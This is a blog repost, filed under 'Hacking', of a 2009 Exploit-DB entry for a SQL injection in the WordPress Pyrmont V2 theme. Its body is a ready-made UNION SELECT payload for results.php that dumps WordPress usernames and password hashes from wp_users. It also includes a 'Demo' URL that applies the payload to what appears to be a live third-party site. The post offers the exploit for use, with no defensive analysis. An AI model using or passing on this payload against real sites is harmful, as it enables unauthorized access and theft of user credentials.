18

Dec

WordPress and Pyrmont V2. SQL Injection Vulnerability

Posted by admin  Published in Hacking

# Title: WordPress and Pyrmont V2. SQL Injection Vulnerability
# EDB-ID: 10535
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Gamoscu
# Published: 2009-12-18
# Verified: no
# Download Exploit Code
# Download N/A

view source
print?
#############################################################
# WordPress and Pyrmont V2. SQL Injection Vulnerability

# Plugin Home: http://wordpress.org/extend/themes/pyrmont-v2

# Author: Gamoscu

# Site: www.1923turk.biz

# Site: http://gamoscu.wordpress.com/

##############################################################

# Exploit:
http://server/path/results.php?id=-9999+union+select+1,concat_ws(0×3a,user_login,user_pass),

3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users

-9999+union+select+1,concat_ws(0×3a,user_login,user_pass),3,4,5,6,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users

# Demo: http://cc.cc.moose.cc/maps/results.php?id=-9999+union+select+1,concat_ws(0×3a,user_login,user_pass)

,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users

##############################################################
# Greetz: Manas58 Baybora Delibey Tiamo Psiko
##############################################################

Vatan Lafla Deðil Eylemle Sevilir

Related Articles

No user responded in this post

Subscribe to this post comment rss or trackback url
Leave A Reply

 Username (Required)

 Email Address (Remains Private)

 Website (Optional)